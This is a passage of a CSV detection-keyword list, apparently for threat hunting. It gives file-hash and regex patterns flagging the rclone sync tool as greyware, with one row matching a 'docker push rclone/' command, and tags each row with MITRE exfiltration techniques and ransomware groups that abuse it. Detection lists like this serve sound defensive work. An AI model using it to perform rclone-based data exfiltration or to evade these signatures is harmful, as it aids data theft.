Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*df557d2f31842b7476600808e4582cd1e0e28580747275b9021c78cce7d4e9f8*",".{0,1000}df557d2f31842b7476600808e4582cd1e0e28580747275b9021c78cce7d4e9f8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*df63a02d4cf67f0dde9d0b86b7206da34acbd5519103d475c0812e3104e258f7*",".{0,1000}df63a02d4cf67f0dde9d0b86b7206da34acbd5519103d475c0812e3104e258f7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*df7cb781f9310ee813100f683eed73260d4e235e6055b26cbddd798e29ae386f*",".{0,1000}df7cb781f9310ee813100f683eed73260d4e235e6055b26cbddd798e29ae386f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*df8a6b5079a27c69eba33a8aead354e5a83773df80debba30b3d39f3b90085f4*",".{0,1000}df8a6b5079a27c69eba33a8aead354e5a83773df80debba30b3d39f3b90085f4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*dff7e5c9de46a140ab872e56ef4a68533fa916b501290c7bbff09428622cddde*",".{0,1000}dff7e5c9de46a140ab872e56ef4a68533fa916b501290c7bbff09428622cddde.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*docker push rclone/*",".{0,1000}docker\spush\srclone\/.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e023e84ae168c960b037db2d17b215362e19076f40f746f9190bb963302a4d77*",".{0,1000}e023e84ae168c960b037db2d17b215362e19076f40f746f9190bb963302a4d77.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e0272a3f67b105e1dccc1392e13988601fc5ba98f92a66671746e9ada9022604*",".{0,1000}e0272a3f67b105e1dccc1392e13988601fc5ba98f92a66671746e9ada9022604.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - 
T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e05409fc66a81a3eab2410908bf37f7cf497c88edb27cbcc92d8f5f1917e195f*",".{0,1000}e05409fc66a81a3eab2410908bf37f7cf497c88edb27cbcc92d8f5f1917e195f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e07196fcbeefe4576e84ad0c98dfccd505eb8eed76b3066fde1fc5709037c6f8*",".{0,1000}e07196fcbeefe4576e84ad0c98dfccd505eb8eed76b3066fde1fc5709037c6f8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e0a35750d7771ee98cdf9f92b8c061e29c746301d4a62b7789ee063fcf40a012*",".{0,1000}e0a35750d7771ee98cdf9f92b8c061e29c746301d4a62b7789ee063fcf40a012.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e0bb1a2b4ddfb4d1fbb10b80772c9ed067e8c78b5508814177a2e88fbe6421db*",".{0,1000}e0bb1a2b4ddfb4d1fbb10b80772c9ed067e8c78b5508814177a2e88fbe6421db.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e0c0eda604f9a3db5f838575a25896f8713eddbca720ceb46db4f98cda952cd2*",".{0,1000}e0c0eda604f9a3db5f838575a25896f8713eddbca720ceb46db4f98cda952cd2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e0db3369783d27acde635da924c59a7dc6551636239650d99bdd81768637416f*",".{0,1000}e0db3369783d27acde635da924c59a7dc6551636239650d99bdd81768637416f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e1382bc1b7fe6c39cd5ada3e9ce8f9cdd16a544c10fc787d3b66d42c0d70606b*",".{0,1000}e1382bc1b7fe6c39cd5ada3e9ce8f9cdd16a544c10fc787d3b66d42c0d70606b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e140fc0a38963bc0013b0dc560f5fb8a2ac2b8a61ebb563fd45a549a699ef46b*",".{0,1000}e140fc0a38963bc0013b0dc560f5fb8a2ac2b8a61ebb563fd45a549a699ef46b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e1618fe1b30e7d0b85c5f8326b07c29b06082044828fd6af11cdf517ae252d48*",".{0,1000}e1618fe1b30e7d0b85c5f8326b07c29b06082044828fd6af11cdf517ae252d48.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e1856edfa60e8d06444b394b671f087d0773dcac63c6799e8954bf9d46c6b3c5*",".{0,1000}e1856edfa60e8d06444b394b671f087d0773dcac63c6799e8954bf9d46c6b3c5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e1f0a372e98f0f21fbbcea25ce9c8b55b3a9f813e20945c281fc015d72398722*",".{0,1000}e1f0a372e98f0f21fbbcea25ce9c8b55b3a9f813e20945c281fc015d72398722.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e20f6b94475b463c5fde8de986f50c941d90acd40308f942650d8df55c248c4f*",".{0,1000}e20f6b94475b463c5fde8de986f50c941d90acd40308f942650d8df55c248c4f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e213492166555a1f97e9b176f4726d8697e211333e0a48d93a078e76f757cedb*",".{0,1000}e213492166555a1f97e9b176f4726d8697e211333e0a48d93a078e76f757cedb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e2427a6915366b0ca85299968e96e0dc9a05764f38ee6e1db31e8bab5cec9d35*",".{0,1000}e2427a6915366b0ca85299968e96e0dc9a05764f38ee6e1db31e8bab5cec9d35.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e24c34b9f0331577e380c04356b2816f1728875cdc09518e056e3ce8b7613f64*",".{0,1000}e24c34b9f0331577e380c04356b2816f1728875cdc09518e056e3ce8b7613f64.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e25b9a19ddc6406c8e3d0bf1a517440468af9e0a2df3bc7036998c9b59042005*",".{0,1000}e25b9a19ddc6406c8e3d0bf1a517440468af9e0a2df3bc7036998c9b59042005.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e2760a77c208012b4efcd2f6920498bde88b086b2d57d7561a477b84484b0da8*",".{0,1000}e2760a77c208012b4efcd2f6920498bde88b086b2d57d7561a477b84484b0da8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e2f8762686702dff4531d4b3f9c066803aec324b5e5acd80cc42fe67fb732e71*",".{0,1000}e2f8762686702dff4531d4b3f9c066803aec324b5e5acd80cc42fe67fb732e71.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e308c72138c1dc9e72e28a47cbf7bfaaed2cf37c3e9e97cc5a597b2cc06ac85d*",".{0,1000}e308c72138c1dc9e72e28a47cbf7bfaaed2cf37c3e9e97cc5a597b2cc06ac85d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e343919768a7ccd17805088d7871dfcf70e19fe55dc7523e7f58b93aefd83a55*",".{0,1000}e343919768a7ccd17805088d7871dfcf70e19fe55dc7523e7f58b93aefd83a55.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e36f536b03bdd6ef314ecf87df08cb5388d311b417e4b94bc63f1195c8a7ceae*",".{0,1000}e36f536b03bdd6ef314ecf87df08cb5388d311b417e4b94bc63f1195c8a7ceae.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e3c567b8467ec2c69311aeb4af04169074c07b188053cb6a5e6aa0e57660e2ba*",".{0,1000}e3c567b8467ec2c69311aeb4af04169074c07b188053cb6a5e6aa0e57660e2ba.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e4077938492c759faad74dcd118a8e901352181f1d146efd18b81c745a088231*",".{0,1000}e4077938492c759faad74dcd118a8e901352181f1d146efd18b81c745a088231.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e40c82c2798591a11de31b07fd186529519ca493490cbfe55dfc26a5a1fd9634*",".{0,1000}e40c82c2798591a11de31b07fd186529519ca493490cbfe55dfc26a5a1fd9634.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e4951caf71f529f6510592a3c05ae61d0fd2f04e39684aabcd87159349d71688*",".{0,1000}e4951caf71f529f6510592a3c05ae61d0fd2f04e39684aabcd87159349d71688.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e4b3ee4b8853f1e92de5e0a4d80da98eedeeb537c148c7a270ca5322e9b9d23d*",".{0,1000}e4b3ee4b8853f1e92de5e0a4d80da98eedeeb537c148c7a270ca5322e9b9d23d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e4bf082697fb0b4f13cbe088436f0a2b43024812b903553f48917c7dadfd4248*",".{0,1000}e4bf082697fb0b4f13cbe088436f0a2b43024812b903553f48917c7dadfd4248.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*e4c1685563f2c9ed84801c3e2730cbdeb38d9554d388329dfa77eb0b54ac0877*",".{0,1000}e4c1685563f2c9ed84801c3e2730cbdeb38d9554d388329dfa77eb0b54ac0877.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" 